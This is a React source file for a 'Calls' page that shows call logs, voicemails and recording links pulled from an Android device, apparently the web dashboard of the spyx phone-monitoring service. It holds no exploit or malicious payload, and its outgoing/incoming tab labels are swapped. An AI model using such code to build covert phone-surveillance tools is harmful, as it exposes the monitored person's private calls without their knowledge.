// ** React Imports
import { useCallback, useState, useEffect, useRef } from 'react'

import { useTranslation } from 'src/utils/i18n'
import { styled } from '@mui/material/styles'

// request
import { useAndroidDevicePagedData } from 'src/hooks/useAndroidDevicePagedData'
import { buildTimeParams, toMillis } from 'src/utils/dateRangeParams'
import dayjs from 'dayjs'
import duration from 'dayjs/plugin/duration'
import { useDispatch } from 'react-redux'
import Image from 'next/image'
import Head from 'next/head'
import { setCurrentTab } from 'src/store/apps/Common'

dayjs.extend(duration)

import { DatePicker } from 'antd'
import ContentLoading from 'src/components/ContentLoading'

const { RangePicker } = DatePicker

const CustomRangePicker = styled(RangePicker)`
  .ant-picker-input {
    width: auto;
  }
  .ant-picker-input > input {
    max-width: 98px;
    text-align: center;
    text-overflow: clip !important;  /* 禁止使用省略号 */
    overflow: visible !important;    /* 允许文本溢出 */
  }
  .ant-picker-input > input::placeholder {
    color:#ADADAD;
  }
  .ant-picker-suffix {
    order:-1;
    opacity:1 !important;
    margin-right:11px;
  }
  .ant-picker-clear {
    display: block !important;
    opacity:1 !important;
  }
`

const ScrollDiv = styled('div')({
  '@media (max-width: 600px)': {
    '-msOverflowStyle': 'none',  /* 适用于 IE 和 Edge */
    scrollbarWidth: 'none',  /* 适用于 Firefox */
    '&::-webkit-scrollbar': {
      display: 'none', /* 适用于 WebKit 浏览器（如 Chrome、Safari 和新版 Edge） */
    }
  }
})

const Calls = () => {
  const { t } = useTranslation('common')

  let Advanced = window.localStorage.getItem('Advanced')
  Advanced = Advanced == null || Advanced == 0 ? true : false

  // ** State

  const [initCalls, setInitCalls] = useState([])

  const [addUserOpen, setAddUserOpen] = useState(false)

  const [allCalls, setAllCalls] = useState([])
  const [calls, setCalls] = useState([])

  const [active, setActive] = useState('CALL_HISTORY')

  const [currentState, setCurrentState] = useState('all')
  const [antdSelectedDates, setAntdSelectedDates] = useState([])
  const { context, data: callRecords, loading: isLoading, loadNext, setDateRange } = useAndroidDevicePagedData({
    source: 'local',
    category: active,
    limit: 50
  })

  useEffect(() => {
    const result = callRecords.map(item => {
      return {
        ...item,
        time:
          active == 'VOICEMAIL'
            ? dayjs(Number(`${item.date}000`)).format('YYYY-MM-DD HH:mm')
            : dayjs(Number(`${item.date}`)).format('YYYY-MM-DD HH:mm'),
        url: `https://cos.spyx.com/${item.url}.mp3`,
        type: active,
        playing: false,
        sender: active == 'VOICEMAIL' ? item.sender : item.displayName
      }
    })

    setAllCalls(result)
    setInitCalls(result)
  }, [active, callRecords])

  useEffect(() => {
    setCurrentState('all')
    setAntdSelectedDates([])
    setAddUserOpen(false)
    setScroll(0)
  }, [context?.requestKey])

  // 获取当前状态的数据
  const getStateData = useCallback((datas = antdSelectedDates) => {
    const _list = [...allCalls]
    let list = _list.filter(item => {
      if (currentState === 'all') {
        return item
      } else if (currentState === 'outgoing') {
        return item.originated === 1
      } else if (currentState === 'missed') {
        return item.originated === 0 && item.duration === 0
      } else if (currentState === 'incoming') {
        return item.originated === 0 && item.duration !== 0
      } else {
        return item
      }
    })

    if (datas && datas.length === 2) {
      const { startTime, endTime } = buildTimeParams(datas)

      const newDateList = list.filter(item => {
        // item.date 可能是秒或毫秒，统一成毫秒再比较
        const itemTime = toMillis(item.created ?? item.date)

        return itemTime >= startTime && itemTime <= endTime
      })

      list = newDateList
    }

    setCalls(() => [...list])
  }, [allCalls, antdSelectedDates, currentState])

  // 查看不同状态的通话记录
  useEffect(() => {
    getStateData()
  }, [getStateData])

  const domRef = useRef(null)

  // 滚动百分比
  const [scroll, setScroll] = useState(0)

  // 监听进度条滚动
  useEffect(() => {
    const handleScroll = () => {
      if (domRef.current) {
        const { scrollTop, scrollHeight, clientHeight } = domRef.current
        const progress = (scrollTop / (scrollHeight - clientHeight)) * 100
        setScroll(progress.toFixed(0))
      }
    }

    const currentRef = domRef.current
    if (currentRef) {
      currentRef.addEventListener('scroll', handleScroll)
    }

    return () => {
      if (currentRef) {
        currentRef.removeEventListener('scroll', handleScroll)
      }
    }
  }, [])

  useEffect(() => {
    if (scroll >= 100) loadNext()
  }, [loadNext, scroll])

  const dispatch = useDispatch()

  useEffect(() => {
    const title = t('Call')
    dispatch(setCurrentTab(title))

    return () => dispatch(setCurrentTab(''))
  }, [dispatch, t])

  // 获取今天的日期
  const today = dayjs().format('YYYY-MM-DD')

  // 获取七天前的日期
  const sevenDaysAgo = dayjs().subtract(7, 'day').format('YYYY-MM-DD')

  //选择日期范围
  const handleDateChange = dates => {
    const picked = dates && dates.length === 2 ? dates : []

    setAntdSelectedDates(picked)

    // 走接口按日期重新拉取（不筛选时传 null）；getStateData 作为本地兜底
    const { startTime, endTime } = buildTimeParams(picked)
    setDateRange(picked.length === 2 ? { startTime, endTime } : null)
    getStateData(picked)
  }

  return (
    <>
      <Head>
        <meta name="format-detection" content="telephone=no" />
      </Head>
      <div className='w-[144px] Blds:w-[528px] h-[33px] Blds:h-[42px] flex bg-[#EAEAEA] Blds:bg-inherit rounded-[8px] mb-[15px] mx-auto'>
        <div className='flex-1 Blds:flex-auto flex justify-center items-center'>
          <div
            className={`${currentState === 'all'
              ? 'bg-[#FFF] Blds:bg-[#EAEAEA] drop-shadow-[0_2px_2px_rgba(0,0,0,0.1)] Blds:drop-shadow-none'
              : ''
              } w-[30px] Blds:w-auto h-[30px] Blds:h-auto Blds:px-[4px] Blds:py-[9px] flex justify-center items-center rounded-[8px] cursor-pointer`}
            onClick={() => setCurrentState('all')}
          >
            <Image src='/images/calls/all-call.svg' width={24} height={24} alt='all call' />
            <span className='text-[14px] text-[#000] ml-[8px] Bld:hidden'>{t('All Calls')}</span>
          </div>
        </div>
        <div className='flex-1 Blds:flex-auto flex justify-center items-center'>
          <div
            className={`${currentState === 'missed'
              ? 'bg-[#FFF] Blds:bg-[#EAEAEA] drop-shadow-[0_2px_2px_rgba(0,0,0,0.1)] Blds:drop-shadow-none'
              : ''
              } w-[30px] Blds:w-auto h-[30px] Blds:h-auto Blds:px-[4px] Blds:py-[9px] flex justify-center items-center rounded-[8px] cursor-pointer`}
            onClick={() => setCurrentState('missed')}
          >
            <Image src='/images/calls/missed.svg' width={24} height={24} alt='missed' />
            <span className='text-[14px] text-[#000] ml-[8px] Bld:hidden'>{t('Missed Calls')}</span>
          </div>
        </div>
        <div className='flex-1 Blds:flex-auto flex justify-center items-center'>
          <div
            className={`${currentState === 'outgoing'
              ? 'bg-[#FFF] Blds:bg-[#EAEAEA] drop-shadow-[0_2px_2px_rgba(0,0,0,0.1)] Blds:drop-shadow-none'
              : ''
              } w-[30px] Blds:w-auto h-[30px] Blds:h-auto Blds:px-[4px] Blds:py-[9px] flex justify-center items-center rounded-[8px] cursor-pointer`}
            onClick={() => setCurrentState('outgoing')}
          >
            <Image src='/images/calls/outgoing.svg' width={24} height={24} alt='outgoing' />
            <span className='text-[14px] text-[#000] ml-[8px] Bld:hidden'>{t('Incoming Calls')}</span>
          </div>
        </div>
        <div className='flex-1 Blds:flex-auto flex justify-center items-center'>
          <div
            className={`${currentState === 'incoming'
              ? 'bg-[#FFF] Blds:bg-[#EAEAEA] drop-shadow-[0_2px_2px_rgba(0,0,0,0.1)] Blds:drop-shadow-none'
              : ''
              } w-[30px] Blds:w-auto h-[30px] Blds:h-auto Blds:px-[4px] Blds:py-[9px] flex justify-center items-center rounded-[8px] cursor-pointer`}
            onClick={() => setCurrentState('incoming')}
          >
            <Image src='/images/calls/incoming.svg' width={24} height={24} alt='incoming' />
            <span className='text-[14px] text-[#000] ml-[8px] Bld:hidden'>{t('Outgoing Calls')}</span>
          </div>
        </div>
      </div>

      <ScrollDiv ref={domRef} className='bg-[#FFF] drop-shadow-[0_0_12px_rgba(0,0,0,0.13)] rounded-[10px] Bxl:h-[calc(var(--vh2)*100-144px)] Bxls:Headers5:h-[calc(var(--vh2)*100-202px)] Header5:big:h-[calc(var(--vh2)*100-267px)] bigs:h-[calc(var(--vh2)*100-327px)] pb-[20px] flex flex-col overflow-auto relative'>
        <table className='border-separate border-spacing-x-[15px] border-spacing-y-[10px] w-full table-fixed px-5 smj:hidden'>
          <tr className='sticky top-0 bg-[#FFF] relative'>
            <th className='text-nowrap pt-[10px] text-start text-[14px] text-[#000] font-[600]'>{t('NAME OR NUMBER')}</th>
            <th className='text-nowrap pt-[10px] text-start text-[14px] text-[#000] font-[600]'>{t('STATE')}</th>
            <th className='text-nowrap pt-[10px] text-start text-[14px] text-[#000] font-[600]'>{t('NAME')}</th>
            <th className='text-nowrap pt-[10px] text-start text-[14px] text-[#000] font-[600]'>{t('DURATION')}</th>
            <th className='text-nowrap pt-[10px] text-start text-[14px] text-[#000] font-[600]'>{t('DATE')}</th>
          </tr>
          {calls.map((row, i) => (
            <tr key={i}>
              <td className='text-[14px] text-[#000] text-nowrap'>{row.displayName || row.phoneNumber}</td>
              <td className='text-[14px] text-[#000] text-nowrap flex items-center pr-[30px]'>
                <Image
                  className='mr-[5px]'
                  src={
                    row.originated === 0
                      ? row.duration === 0
                        ? '/images/calls/missed.svg'
                        : '/images/calls/incoming.svg'
                      : '/images/calls/outgoing.svg'
                  }
                  width={24}
                  height={24}
                  alt={row.originated === 0 ? (row.duration === 0 ? 'missed' : 'incoming') : 'outgoing'}
                />
                {row.originated === 0 ? (row.duration === 0 ? 'Missed' : 'Incoming') : 'Outgoing'}
              </td>
              <td className='text-[14px] text-[#000] text-nowrap'>{row.name}</td>
              <td className='text-[14px] text-[#000] text-nowrap'>
                {dayjs.duration(row.duration, 'seconds').format('mm:ss')}
              </td>
              <td className='text-[14px] text-[#000] text-nowrap'>{row.time}</td>
            </tr>
          ))}
        </table>

        {/* 新ui */}
        <div className='smjs:hidden h-auto'>
          <div className='w-full p-[15px_15px_12px] sticky top-0 bg-white border-[#e6e6e6] border-b-[0.5px] relative'>
            <CustomRangePicker
              format="YYYY-MM-DD" // 左右两边显示的日期格式
              placeholder={[sevenDaysAgo, today]} // 默认显示占位符
              separator={<span className={`text-[#ADADAD]`}>~</span>} // 两个日期的间隔符
              suffixIcon={<Image src="/images/calls/calendar.svg" alt='calendar' width={18} height={18} />} // 替换默认icon
              className='w-full h-[40px] bg-[#F8F8F8]'
              inputReadOnly={true} // 禁用手机弹出输入法 true为不允许弹出
              // allowClear={false} // 清除按钮是否显示
              onChange={handleDateChange}
            />
          </div>

          {calls.map((row, index) => (
            <div key={index} className='h-[64px] flex w-full'>
              <div className='w-[20px] mt-3 mr-2 ml-[15px]'>
                {row.originated === 1 && <Image src="/images/calls/outgoing2.svg" alt='outgoing' width={18} height={18} />}
              </div>
              <div className='border-[#e6e6e6] border-b-[0.5px] w-full flex flex-col justify-center h-[64px] font-[Poppins]'>
                <div className='flex justify-between'>
                  <p className={`text-[16px] font-[500] leading-[24px] ${row.originated === 0 && row.duration === 0 ? ' text-[#FE1616]' : ' text-[#000000]'}`}>{row.displayName || row.phoneNumber}</p>
                  <p className='text-[16px] font-[500] leading-[24px] text-[#000000] mr-[15px]'>{row.name}</p>
                </div>
                <div className='flex justify-between'>
                  <p className='text-[14px] font-[400] leading-[21px] text-[#8A8A8E]'>{dayjs.duration(row.duration, 'seconds').format('HH:mm:ss')}</p>
                  <p className='text-[14px] font-[400] text-[#8A8A8E] leading-[21px] mr-[15px]'>{dayjs(row.time).format('YYYY/MM/DD HH:mm')}</p>
                </div>
              </div>
            </div>
          ))}
        </div>
        {isLoading ? (
        <div className='absolute inset-0 z-[20] bg-[#FFF] rounded-[10px]'>
          <ContentLoading />
        </div>
      ) : null}
{(allCalls.length > 0 || isLoading) ||
          <div className='text-center px-2 absolute inset-0 flex justify-center items-center pointer-events-none'>
            {t('It appears theres no data to show here yet')}<br />
            {t('If data exists it may take up to 1 hour to download and appear')}<br />
            {t('We suggest checking back in a little while')}
          </div>}
      </ScrollDiv>
    </>
  )
}

export default Calls
